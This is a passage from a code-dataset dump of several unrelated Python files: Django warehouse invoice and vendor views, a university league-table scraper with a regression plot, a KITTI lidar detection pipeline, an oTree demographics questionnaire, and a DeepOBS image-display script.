super().form_valid(form)\n\n\n@method_decorator(staff_member_required, name='dispatch')\nclass UpdateInvoiceOrderItem(UpdateView):\n model = InvoiceOrderItem\n form_class = CreateOrderItemForm\n template_name = 'dashboard/form.html'\n\n def get_success_url(self):\n return reverse('warehouse:update_order', kwargs={'pk': self.object.order.id})\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n form_title = f'Edit {self.object}'\n back_url, delete_url = self.get_success_url(), reverse('warehouse:order-item-delete', kwargs={'pk': self.object.id})\n context.update(locals())\n return context\n\n\n@staff_member_required\ndef delete_warehouse_order_item_view(request, pk):\n instance = get_object_or_404(InvoiceOrderItem, id=pk)\n instance.delete()\n return redirect(reverse('warehouse:update_order', kwargs={'pk': instance.order.id}))\n\n\n@staff_member_required\ndef delete_warehouse_order_view(request, pk):\n instance = get_object_or_404(Invoice, id=pk)\n instance.delete()\n return redirect(reverse('warehouse:invoices'))\n\n\n@staff_member_required\ndef create_copy_invoice_view(request, pk):\n instance = get_object_or_404(Invoice, id=pk)\n form = CopyInvoiceForm(request.POST or None)\n if form.is_valid():\n date_expired = form.cleaned_data.get('date_expired', None)\n order_type = form.cleaned_data.get('order_type', None)\n if date_expired and order_type:\n new_invoice = Invoice.objects.create(\n order_type=order_type,\n date_expired=date_expired,\n vendor=instance.vendor,\n is_paid=instance.is_paid,\n payment_method=instance.payment_method,\n taxes_modifier=instance.taxes_modifier,\n\n )\n for item in instance.order_items.all():\n InvoiceOrderItem.objects.create(\n order=new_invoice,\n product=item.product,\n qty=item.qty,\n value=item.value,\n discount_value=item.discount_value\n )\n return redirect(new_invoice.get_edit_url())\n form_title, back_url = f'Αντιγραφή...', instance.get_edit_url()\n context = locals()\n return render(request, 'dashboard/form.html', context=context)\n\n\n@method_decorator(staff_member_required, name='dispatch')\nclass VendorListView(ListView):\n model = Vendor\n template_name = 'dashboard/list_page.html'\n paginate_by = 50\n\n def get_queryset(self):\n queryset = Vendor.objects.all()\n queryset = Vendor.filter_data(self.request, queryset)\n return queryset\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n queryset_table = VendorTable(self.object_list)\n create_url, back_url, page_title = reverse('warehouse:vendor_create'), reverse('dashboard:home'), 'Προμηθευτές'\n RequestConfig(self.request).configure(queryset_table)\n context.update(locals())\n return context\n\n\n@method_decorator(staff_member_required, name='dispatch')\nclass VendorCreateView(CreateView):\n model = Vendor\n form_class = VendorForm\n template_name = 'dashboard/form.html'\n success_url = reverse_lazy('warehouse:vendors')\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n back_url, delete_url = self.success_url, None\n form_title = 'Create new Vendor'\n context.update(locals())\n return context\n\n\n@method_decorator(staff_member_required, name='dispatch')\nclass VendorUpdateView(UpdateView):\n model = Vendor\n form_class = VendorForm\n template_name = 'dashboard/form.html'\n success_url = reverse_lazy('warehouse:vendors')\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n back_url, delete_url = reverse('warehouse:vendors'), 
reverse('warehouse:vendor_delete', kwargs={'pk': self.kwargs['pk']})\n form_title = f'Edit {self.object}'\n context.update(locals())\n return context\n\n\n@staff_member_required\ndef delete_vendor(request, pk):\n instance = get_object_or_404(Vendor, id=pk)\n instance.delete()\n return redirect(reverse('warehouse:vendors'))\n\n\n@staff_member_required\ndef vendor_report_view(request, pk):\n vendor = get_object_or_404(Vendor, id=pk)\n invoices = vendor.vendor_orders.all()\n products = vendor.product_set.all()\n warehouse_movements = InvoiceOrderItem.objects.filter(product__in=products)\n products_table = VendorProductReportTable(products)\n invoices_table = VendorOrderTable(invoices)\n warehouse_movements_table = VendorWarehouseMovementTable(warehouse_movements)\n RequestConfig(request, paginate={'per_page': 10}).configure(invoices_table)\n RequestConfig(request, paginate={'per_page': 10}).configure(products_table)\n RequestConfig(request, paginate={'per_page': 10}).configure(warehouse_movements_table)\n context = locals()\n return render(request, 'warehouse/vendor_report_page.html', context)\n\n\n@method_decorator(staff_member_required, name='dispatch')\nclass CreateInvoiceImageView(CreateView):\n model = InvoiceImage\n form_class = InvoiceImageForm\n template_name = 'dashboard/form.html'\n\n def get_success_url(self):\n return reverse('warehouse:update_order', kwargs={'pk': self.kwargs['pk']})\n\n def get_initial(self):\n initial = super().get_initial()\n order = get_object_or_404(Invoice, id=self.kwargs['pk'])\n initial['order_related'] = order\n return initial\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n form_title = 'Create new Image'\n back_url, delete_url = self.get_success_url(), None\n context.update(locals())\n return context\n\n\n@method_decorator(staff_member_required, name='dispatch')\nclass UpdateInvoiceImageView(UpdateView):\n model = InvoiceImage\n form_class = InvoiceImageForm\n template_name = 'dashboard/form.html'\n\n def get_success_url(self):\n return reverse('warehouse:update_order', kwargs={'pk': self.object.order_related.id})\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n form_title = f'Edit {self.object}'\n back_url, delete_url = self.get_success_url(), reverse('warehouse:delete-order-image', kwargs={'pk': self.object.id})\n context.update(locals())\n return context\n\n\n@staff_member_required\ndef delete_invoice_image_view(request, pk):\n instance = get_object_or_404(InvoiceImage, id=pk)\n instance.delete()\n return redirect(reverse('warehouse:update_order', kwargs={'pk': instance.order_related.id}))\n\n\n\n","repo_name":"Zefarak/shop_manager","sub_path":"warehouse/invoice_views.py","file_name":"invoice_views.py","file_ext":"py","file_size_in_byte":13148,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"70646458495","text":"# This program attempts to find any link / correlation between the entry standards of universities, and the graduate prospects of students after leaving uni\n# The obvious hypothesis is that universities with greater entry requirements will get better graduate standards, since good students coming in are probably going\n# to be good students coming out of uni (and vice versa in the general case)\n\n# As a bonus, I'll also add student satisfaction as the colour dimension so maybe there's a correlation there too? 
The better students are happier/more miserable?\n\nimport requests as rq\nfrom bs4 import BeautifulSoup as BS\n\n# Beep boop. I'm a human.\nheaders = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko/20100101 Firefox/78.0'\n}\n\n# I only understand pixels. A pixel is 1/96 of an inch apparently\npx = 1/96\n\n# Parse the incoming data\nget_the_data = rq.get(\"https://www.thecompleteuniversityguide.co.uk/league-tables/rankings/computer-science\", headers=headers).text\nsoup = BS(get_the_data, \"html.parser\")\n\n# Find the league tables themselves, this seeming gibberish is actually the tags required to find them\ntables = soup.find(\"div\" , {\"class\" : \"tabl_wrap clr tabl_div\"}).find(\"div\" , {\"class\" : \"rgt_col swiper-container swiper-container-initialized swiper-container-horizontal\"})\n\n# The tables are organised so that rt_list(x) is just the (x+1)th column on the table, so easy to read from\n# They're all given the class of \"col_one\"\n\n# Each element in these lists is actually just a tag, we need to extract the actual percentage from the tag using an element-wise function\n# The ordering of this data is important, because entry_standards_data[i] is supposed to be mapped to grad_prospects_data[i] and student_satisfaction_data[i]\n# So a change in the ordering of a list could result in data mismatches which would wipe out the data\nentry_standards_data = tables.find(\"li\" , {\"class\" : \"swiper-slide rt_list2 swiper-slide-next\"}).find_all(\"div\" , {\"class\" : \"col_one\"})\nstudent_satisfaction_data = tables.find(\"li\" , {\"class\" : \"swiper-slide rt_list3\"}).find_all(\"div\" , {\"class\" : \"col_one\"})\ngrad_prospects_data = tables.find(\"li\" , {\"class\" : \"swiper-slide rt_list6\"} ).find_all(\"div\" , {\"class\" : \"col_one\"})\n\n# And that function is this one\n# Converts tag to the numerical value\ndef convert(x):\n # If the data is N/A then it will not be possible to get the numerical data\n try:\n # This long expression just extracts the string % value, drops the % at the end and casts to an int (always integer percentages)\n return int( x.find(\"span\" , {\"class\" : \"smtxt\"}).text[:-1:])\n # An N/A cell has no \"smtxt\" span, so .find() returns None and .text raises AttributeError\n except (AttributeError, ValueError):\n # If data is N/A then just return -1 to make it obvious\n return -1\n
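\n# A quick, self-contained sanity check of convert() -- purely illustrative, and it assumes\n# the live table keeps the same <span class=\"smtxt\"> markup inside each \"col_one\" cell:\ndemo_cell = BS('<div class=\"col_one\"><span class=\"smtxt\">78%</span></div>', \"html.parser\").find(\"div\", {\"class\": \"col_one\"})\nassert convert(demo_cell) == 78\n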
\n# It's graphin' time. (graphs all over the place)\n\nfrom matplotlib import pyplot as plt\nimport numpy as np\nimport matplotlib.colors as mcolors\n\n# Darkred - yellow - lime/green, a colourmap I took from EU4\nmy_cmap=mcolors.LinearSegmentedColormap.from_list('rg',[\"darkred\", \"yellow\", \"lime\"], N=256) \n\n# This converts the obtained data into integer form so it can be plotted - order is preserved\nentry_standards = [ convert(x) for x in entry_standards_data] \nstudent_satisfaction = [ convert(x) for x in student_satisfaction_data]\ngrad_prospects = [ convert(x) for x in grad_prospects_data] \n\n# This section removes any data points which have N/A values since these would skew our graph with anomalous results\n# If one list has an N/A at index i, the entries at index i in the other two lists must go too, so every x-axis value keeps its mappings\n# (removing from a list while iterating over it skips elements, so the lists are rebuilt from the kept indices instead)\nkeep = [i for i in range(len(entry_standards)) if entry_standards[i] != -1 and grad_prospects[i] != -1 and student_satisfaction[i] != -1]\nentry_standards = [entry_standards[i] for i in keep]\ngrad_prospects = [grad_prospects[i] for i in keep]\nstudent_satisfaction = [student_satisfaction[i] for i in keep]\n\n# Since student satisfaction is quite universally 80-90% ish, we need to code the data so that min = 0, max = 100 so that we can see some proper colour contrast\nmin_satisfaction = min(student_satisfaction)\nmax_satisfaction = max(student_satisfaction)\n\n# This coding formula will accomplish this goal for us\nstudent_satisfaction = [ ( x - min_satisfaction ) * (100 / (max_satisfaction-min_satisfaction)) for x in student_satisfaction]\n\n# The following data will be used to calculate the coefficients of our regression line (y=mx+b) and the PMCC (r) to determine the strength of the correlation\n# These are the standard least-squares and product-moment formulae from statistics\n\n# This is all the data we need to calculate m,b and r\nn=len(grad_prospects)\nxy_sum = sum( [ entry_standards[i] * grad_prospects[i] for i in range(n)] )\nx_sum =sum(entry_standards)\ny_sum = sum(grad_prospects)\nx_2_sum = sum([ x*x for x in entry_standards] )\navg_x = x_sum / n\navg_y = y_sum / n\n\n# Using the formulas and the above parameters to determine the values of the coefficients m, b and r\nm = (n * xy_sum - x_sum * y_sum) / (n * x_2_sum - (x_sum)**2 )\nb = (y_sum - m * x_sum) / n\nr = ( sum( [ ( entry_standards[i] - avg_x ) * ( grad_prospects[i] - avg_y ) for i in range(n) ] ) \n / ( sum( [( entry_standards[i] - avg_x ) ** 2 for i in range(n) ] ) * ( sum( [( grad_prospects[i] - avg_y ) ** 2 for i in range(n) ] ) ) ) ** 0.5 )\n
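\n# Illustrative spot-check of the m/b/r formulae on a tiny hand-made dataset (not part of the scrape):\n# with entry_standards = [1, 2, 3] and grad_prospects = [2, 4, 6] (y = 2x exactly), the sums are\n# xy_sum = 28, x_sum = 6, y_sum = 12, x_2_sum = 14, so m = (3*28 - 6*12)/(3*14 - 6**2) = 2,\n# b = (12 - 2*6)/3 = 0 and r = 4 / (2*8)**0.5 = 1, i.e. a perfect positive correlation, as expected.\n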
(0-100)\")\nplt.ylabel(\"Graduate prospects (0-100)\")\nplt.colorbar(mappable=the_scatter_plot, extend=\"both\",label=\"Student satisfaction (coded: min = 0, max = 100) \")\n\nplt.legend()\nplt.savefig(\"here\")\n# plt.show()\n","repo_name":"david-git-acc/repos_1","sub_path":"attempt 1.py","file_name":"attempt 1.py","file_ext":"py","file_size_in_byte":6693,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"10391534027","text":"#!/opt/conda/envs/kitti-detection-pipeline/bin/python\n\n# detect.py\n# 1. read Velodyne point cloud measurements\n# 2. perform ground and object segmentation on point cloud\n# 3. predict object category using classification network\n\nimport os\nimport glob\nimport argparse\nimport sys\nimport progressbar\nimport datetime\n\nsys.path.insert(0, './')\n# disable TF log display:\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'\n\n# utils:\nimport utils.velodyne as measurement\nimport utils.visualization as visualization\nimport utils.kitti as output\n# segmentation:\nimport segmentation\n# prediction:\nfrom preprocess import KITTIPCDClassificationDataset\nimport numpy as np\nimport scipy.spatial\n\nimport tensorflow as tf\nfrom tensorflow import keras\nfrom models.cls_msg_model import CLS_MSG_Model\nfrom models.cls_ssg_model import CLS_SSG_Model\n\ntf.random.set_seed(1234)\n\n# open3d:\nimport open3d as o3d\n\ndef load_model(config):\n \"\"\"\n Load pre-trained object classification network\n \n \"\"\"\n # init model:\n if config['msg'] == True:\n model = CLS_MSG_Model(config['batch_size'], config['num_classes'], config['batch_normalization'])\n else:\n model = CLS_SSG_Model(config['batch_size'], config['num_classes'], config['batch_normalization'])\n\n # load params:\n model.load_weights(config['checkpoint_path'])\n\n return model\n\ndef preprocess(\n segmented_objects, object_ids,\n config\n):\n \"\"\"\n Preprocess for classification network\n \"\"\"\n # parse config:\n points = np.asarray(segmented_objects.points)\n normals = np.asarray(segmented_objects.normals)\n num_objects = max(object_ids) + 1\n\n # result:\n X = []\n y = []\n for object_id in range(num_objects):\n # 1. only keep object with enough number of observations:\n if ((object_ids == object_id).sum() <= 4):\n continue\n \n # 2. only keep object within max radius distance:\n object_center = np.mean(points[object_ids == object_id], axis=0)[:2]\n if (np.sqrt((object_center*object_center).sum()) > config['max_radius_distance']):\n continue\n \n # 3. resample:\n points_ = np.copy(points[object_ids == object_id])\n normals_ = np.copy(normals[object_ids == object_id])\n N, _ = points_.shape\n\n weights = scipy.spatial.distance.squareform(\n scipy.spatial.distance.pdist(points_, 'euclidean')\n ).mean(axis = 0)\n weights /= weights.sum()\n \n idx = np.random.choice(\n np.arange(N), \n size = (config['num_sample_points'], ), replace=True if config['num_sample_points'] > N else False,\n p = weights\n )\n\n # 4. 
translate to zero-mean:\n points_processed, normals_processed = points_[idx], normals_[idx]\n points_processed -= points_.mean(axis = 0)\n\n # format as numpy.ndarray:\n X.append(\n np.hstack(\n (points_processed, normals_processed)\n )\n )\n y.append(object_id)\n\n # format as tf dataset:\n X = np.asarray(X)\n y = np.asarray(y)\n\n # pad to batch size:\n N = len(y)\n if (N % config['batch_size'] != 0):\n num_repeat = config['batch_size'] - N % config['batch_size']\n\n X = np.vstack(\n (\n X, \n np.repeat(\n X[0], num_repeat, axis=0\n ).reshape(\n (-1, config['num_sample_points'], 6)\n )\n )\n )\n y = np.hstack(\n (y, np.repeat(y[0], num_repeat))\n )\n\n # format as tensorflow dataset:\n dataset = tf.data.Dataset.from_tensor_slices(\n (\n tf.convert_to_tensor(X, dtype=tf.float32), \n tf.convert_to_tensor(y, dtype=tf.int64)\n )\n )\n dataset = dataset.batch(batch_size=config['batch_size'], drop_remainder=True)\n\n return dataset, N\n\n\ndef predict(segmented_objects, object_ids, model, config):\n \"\"\" \n Load classification network and predict surrounding object category\n\n Parameters\n ----------\n config: dict \n Model training configuration\n\n \"\"\"\n # prepare data:\n dataset, N = preprocess(segmented_objects, object_ids, config)\n\n # make predictions:\n predictions = {\n class_id: {} for class_id in range(config['num_classes'])\n }\n num_predicted = 0\n\n for X, y in dataset:\n # predict:\n prob_preds = model(X)\n ids = y.numpy()\n\n # add to prediction:\n for (object_id, class_id, confidence) in zip(\n # object ID:\n ids,\n # category:\n np.argmax(prob_preds, axis=1),\n # confidence:\n np.max(prob_preds, axis=1)\n ):\n predictions[class_id][object_id] = confidence\n num_predicted += 1\n \n # skip padded instances:\n if (num_predicted == N):\n break\n\n return predictions\n\ndef detect(\n dataset_dir, index,\n max_radius_distance, num_sample_points,\n debug_mode\n):\n # 0. generate I/O paths:\n input_velodyne = os.path.join(dataset_dir, 'velodyne', f'{index:06d}.bin')\n input_params = os.path.join(dataset_dir, 'calib', f'{index:06d}.txt')\n output_label = os.path.join(dataset_dir, 'shenlan_pipeline_pred_2', 'data', f'{index:06d}.txt')\n\n # 1. read Velodyne measurements and calib params:\n point_cloud = measurement.read_measurements(input_velodyne)\n param = measurement.read_calib(input_params)\n\n # 2. segment ground and surrounding objects -- here discard intensity channel:\n segmented_ground, segmented_objects, object_ids = segmentation.segment_ground_and_objects(point_cloud[:, 0:3])\n\n # 3. 
predict object category using classification network:\n config = {\n # preprocess:\n 'max_radius_distance': max_radius_distance,\n 'num_sample_points': num_sample_points,\n # predict:\n 'msg' : True,\n 'batch_size' : 16,\n 'num_classes' : 4,\n 'batch_normalization' : False,\n 'checkpoint_path' : 'logs/msg_1/model/weights.ckpt',\n }\n model = load_model(config)\n predictions = predict(segmented_objects, object_ids, model, config)\n \n # TODO: refactor decoder implementation\n decoder = KITTIPCDClassificationDataset(input_dir='/workspace/data/kitti_3d_object_classification_normal_resampled').get_decoder()\n\n # debug mode:\n if (debug_mode):\n # print detection results:\n for class_id in predictions:\n # show category:\n print(f'[{decoder[class_id]}]')\n # show instances:\n for object_id in predictions[class_id]:\n print(f'\\t[Object ID]: {object_id}, confidence {predictions[class_id][object_id]:.2f}')\n\n # visualize:\n bounding_boxes = visualization.get_bounding_boxes(\n segmented_objects, object_ids, \n predictions, decoder\n )\n o3d.visualization.draw_geometries(\n [segmented_ground, segmented_objects] + bounding_boxes\n )\n \n # 4. format output for KITTI offline evaluation tool:\n label = output.to_kitti_eval_format(\n segmented_objects, object_ids, param,\n predictions, decoder\n )\n label.to_csv(output_label, sep=' ', header=False, index=False)\n\ndef get_arguments():\n \"\"\" \n Get command-line arguments\n\n \"\"\"\n # init parser:\n parser = argparse.ArgumentParser(\"Perform two-stage object detection on KITTI dataset.\")\n\n # add required and optional groups:\n required = parser.add_argument_group('Required')\n optional = parser.add_argument_group('Optional')\n\n # add required:\n required.add_argument(\n \"-i\", dest=\"input\", help=\"Input path.\",\n required=True, type=str\n )\n\n optional.add_argument(\n \"-d\", dest=\"debug_mode\", help=\"When enabled, visualize the result. Defaults to False. \\n\",\n required=False, type=bool, default=False\n )\n optional.add_argument(\n \"-r\", dest=\"max_radius_distance\", help=\"Maximum radius distance between object and Velodyne lidar. \\nUsed for ROI definition. Defaults to 25.0. \\nONLY used in 'generate' mode.\",\n required=False, type=float, default=25.0\n )\n optional.add_argument(\n \"-n\", dest=\"num_sample_points\", help=\"Number of sample points to keep for each object. \\nDefaults to 64. 
\nONLY used in 'generate' mode.\",\n required=False, type=int, default=64\n )\n\n # parse arguments:\n return parser.parse_args()\n\n\nif __name__ == \"__main__\":\n # parse command line arguments\n args = get_arguments()\n\n for label in progressbar.progressbar(\n glob.glob(\n os.path.join(args.input, 'shenlan_pipeline_label_2', '*.txt')\n )\n ):\n # get index:\n index = int(\n os.path.splitext(\n os.path.basename(label)\n )[0]\n )\n\n # perform object detection:\n detect(\n args.input, index,\n args.max_radius_distance, args.num_sample_points,\n args.debug_mode\n )\n","repo_name":"AlexGeControl/3D-Point-Cloud-Analytics","sub_path":"workspace/assignments/project-01-kitti-detection-pipeline/pointnet++/detect.py","file_name":"detect.py","file_ext":"py","file_size_in_byte":9059,"program_lang":"python","lang":"en","doc_type":"code","stars":235,"dataset":"github-code","pt":"79"}
{"seq_id":"70187759297","text":"from otree.api import *\nimport math\n\ndoc = \"\"\"\nDemographic questionnaire and end-of-session payoff summary.\n\"\"\"\n\n\nclass C(BaseConstants):\n NAME_IN_URL = 'Demographics'\n PLAYERS_PER_GROUP = None\n NUM_ROUNDS = 1\n\n\nclass Subsession(BaseSubsession):\n pass\n\n\nclass Group(BaseGroup):\n pass\n\n\nclass Player(BasePlayer):\n age = models.IntegerField(min=16, max=110, label=\"Wie alt sind Sie?\")\n geschlecht = models.IntegerField(\n label=\"Geschlecht:\",\n choices=[\n [1, 'Männlich'],\n [2, 'Weiblich'],\n [3, 'Anderes'],\n [4, 'Keine Angabe'],\n ],\n )\n bildungsgrad = models.IntegerField(\n label=\"Höchster Bildungsabschluss:\",\n choices=[\n [1, 'Abitur'],\n [2, 'Bachelor'],\n [3, 'Diplom'],\n [4, 'Master'],\n [5, 'PhD'],\n [6, 'Sonstiges'],\n ],\n )\n\n gehaltene_anlageprodukte = models.IntegerField(\n label=\"Wie viele verschiedene Anlageprodukte (z.B. Aktien, Fonds, Anleihen, Zertifikate) haben Sie innerhalb des letzten Jahres gehalten?\",\n choices=[\n [1, '0'],\n [2, '1-5'],\n [3, '6-10'],\n [4, 'Mehr als 10'],\n [5, 'Weiß ich nicht'],\n ],\n )\n\n beschäftigungsstatus = models.IntegerField(\n label=\"Derzeitiger Beschäftigungsstatus:\",\n choices=[\n [1, 'Vollzeit'],\n [2, 'Teilzeit'],\n [3, 'Vollzeitstudent'],\n [4, 'Weder beschäftigt noch Student'],\n ],\n )\n # TODO: double-check these demographic fields\n \n field_of_studies = models.StringField(label='Was ist/war Ihre Hauptrichtung im Studium?')\n\n# FUNCTIONS\ndef round_up_to_next_20_cents(value):\n return math.ceil(value * 5) / 5\n\n\n# PAGES\nclass Demographics(Page):\n form_model = 'player'\n form_fields = ['age', 'geschlecht', 'bildungsgrad', 'gehaltene_anlageprodukte', 'beschäftigungsstatus', \"field_of_studies\"]\n\nclass Payoff(Page):\n def vars_for_template(player: Player):\n part = player.participant\n return {\n 'pay_exp': part.vars.get('exp_to_pay', 0),\n 'exp1_pay_round': part.vars.get('round_to_pay', 0),\n 'exp1_pay_ecu': part.vars.get('exp1_pay_ecu', 0),\n 'exp1_pay_eur': round(part.vars.get('exp1_pay_ecu', 0) / 10, 2),\n 'exp2_task': part.vars.get('exp2_task', 0),\n 'banks2_round': part.vars.get('banks2_round_to_pay', 0),\n 'banks2_coinflip': part.vars.get('banks2_coinflip', None),\n 'banks5_round': part.vars.get('banks5_round_to_pay', 0),\n 'banks5_coinflip': part.vars.get('banks5_coinflip', None),\n 'exp2_pay_ecu': part.vars.get('exp2_pay_ecu', 0),\n 'exp2_pay_eur': round(part.vars.get('exp2_pay_ecu', 0) / 10, 2),\n 'rounded_payoff': round_up_to_next_20_cents(part.payoff/10 + player.session.config['participation_fee'])\n }\n\npage_sequence = [Demographics, 
Payoff]\n","repo_name":"chkgk/msc_combined_lab","sub_path":"Demographics/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2933,"program_lang":"python","lang":"de","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"21155461339","text":"# -*- coding: utf-8 -*-\n\"\"\"Script to visualize images from DeepOBS datasets.\"\"\"\n\nimport os\nimport sys\nimport numpy as np\nimport tensorflow as tf\nimport matplotlib.pyplot as plt\n\nsys.path.insert(0, os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__)))))\n\nfrom deepobs.tensorflow import datasets\nimport deepobs.tensorflow.config as config\n\n\ndef denormalize_image(img):\n \"\"\"Convert a normalized (float) image back to unsigned 8-bit images.\"\"\"\n img -= np.min(img)\n img /= np.max(img)\n img *= 255.0\n return np.round(img).astype(np.uint8)\n\n\ndef display_images(dataset_cls, grid_size=5, phase=\"train\"):\n \"\"\"Display images from a DeepOBS data set.\n\n Args:\n dataset_cls: The DeepOBS dataset class to display images from. Is assumed to\n yield a tuple (x, y) of images and one-hot label vectors.\n grid_size (int): Will display grid_size**2 number of images.\n phase (str): Images from this phase ('train', 'train_eval', 'test') will be\n displayed.\n \"\"\"\n tf.reset_default_graph()\n dataset = dataset_cls(batch_size=grid_size * grid_size)\n x, y = dataset.batch\n if phase == \"train\":\n init_op = dataset.train_init_op\n elif phase == \"train_eval\":\n init_op = dataset.train_eval_init_op\n elif phase == \"test\":\n init_op = dataset.test_init_op\n else:\n raise ValueError(\n \"Choose 'phase' from ['train', 'train_eval', 'test'].\")\n with tf.Session() as sess:\n sess.run(init_op)\n x_, y_ = sess.run([x, y])\n label_dict = load_label_dict(dataset_cls.__name__)\n fig = plt.figure()\n for i in range(grid_size * grid_size):\n axis = fig.add_subplot(grid_size, grid_size, i + 1)\n img = np.squeeze(denormalize_image(x_[i]))\n axis.imshow(img)\n # axis.set_title(\"Label {0:d}\".format(np.argmax(y_[i])))\n axis.set_title(label_dict[np.argmax(y_[i])])\n axis.axis(\"off\")\n fig.tight_layout(pad=0, w_pad=0, h_pad=0)\n fig.suptitle(dataset_cls.__name__ + \" (\" + phase + \")\")\n fig.show()\n\n\ndef load_label_dict(dataset):\n \"\"\"Get dict that translates from label number to humanly-readable class\n (e.g. 
from 1 -> automobile on cifar 10)\n\n Args:\n dataset (str): Name of the dataset.\n\n Returns:\n dict: Dictionary that translates from class number to class label.\n\n \"\"\"\n if dataset == \"cifar10\":\n with open(\n os.path.join(config.get_data_dir(),\n \"cifar-10/batches.meta.txt\")) as lookup_file:\n label_dict = lookup_file.readlines()\n elif dataset == \"cifar100\":\n with open(\n os.path.join(config.get_data_dir(),\n \"cifar-100/fine_label_names.txt\")) as lookup_file:\n label_dict = lookup_file.readlines()\n elif dataset == \"fmnist\":\n label_dict = dict([(0, \"T-shirt\"), (1, \"Trouser\"), (2, \"Pullover\"),\n (3, \"Dress\"), (4, \"Coat\"), (5, \"Sandal\"),\n (6, \"Shirt\"), (7, \"Sneaker\"), (8, \"Bag\"),\n (9, \"Ankle boot\")])\n elif dataset == \"imagenet\":\n label_file = os.path.join(\n os.path.realpath(\n os.path.join(os.getcwd(), os.path.dirname(__file__))),\n \"imagenet_labels.txt\")\n # Read from text file\n label_dict = {}\n i = 0\n with open(label_file) as f:\n for line in f:\n label_dict[i] = line.rstrip()\n i += 1\n else:\n label_dict = IdentityDict()\n return label_dict\n\n\nclass IdentityDict(dict):\n \"\"\"An identity dictionary, return the key as value.\"\"\"\n\n def __missing__(self, key):\n return key\n\n\nif __name__ == \"__main__\":\n display_images(datasets.mnist, grid_size=5, phase=\"train\")\n display_images(datasets.mnist, grid_size=5, phase=\"train_eval\")\n display_images(datasets.mnist, grid_size=5, phase=\"test\")\n\n display_images(datasets.fmnist, grid_size=5, phase=\"train\")\n display_images(datasets.fmnist, grid_size=5, phase=\"train_eval\")\n display_images(datasets.fmnist, grid_size=5, phase=\"test\")\n\n display_images(datasets.cifar10, grid_size=5, phase=\"train\")\n display_images(datasets.cifar10, grid_size=5, phase=\"train_eval\")\n display_images(datasets.cifar10, grid_size=5, phase=\"test\")\n\n display_images(datasets.cifar100, grid_size=5, phase=\"train\")\n display_images(datasets.cifar100, grid_size=5, phase=\"train_eval\")\n display_images(datasets.cifar100, grid_size=5, phase=\"test\")\n\n display_images(datasets.svhn, grid_size=5, phase=\"train\")\n display_images(datasets.svhn, grid_size=5, phase=\"train_eval\")\n display_images(datasets.svhn, grid_size=5, phase=\"test\")\n\n display_images(datasets.imagenet, grid_size=5, phase=\"train\")\n display_images(datasets.imagenet, grid_size=5, phase=\"train_eval\")\n display_images(datasets.imagenet, grid_size=5, phase=\"test\")\n\n plt.show()\n","repo_name":"fsschneider/DeepOBS","sub_path":"tests/datasets/display_image_datasets.py","file_name":"display_image_datasets.py","file_ext":"py","file_size_in_byte":4937,"program_lang":"python","lang":"en","doc_type":"code","stars":97,"dataset":"github-code","pt":"79"}
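A minimal standalone check of the denormalize_image() rescaling used in the record above -- hypothetical pixel values, nothing beyond numpy assumed:

import numpy as np

# denormalize_image() min-max rescales any float image into the full 0..255 range:
img = np.array([[-1.0, 0.0], [0.5, 1.0]])
img -= np.min(img)  # shift so the minimum becomes 0.0
img /= np.max(img)  # scale so the maximum becomes 1.0
img *= 255.0
out = np.round(img).astype(np.uint8)
assert out[0, 0] == 0 and out[1, 1] == 255  # the extremes map exactly to 0 and 255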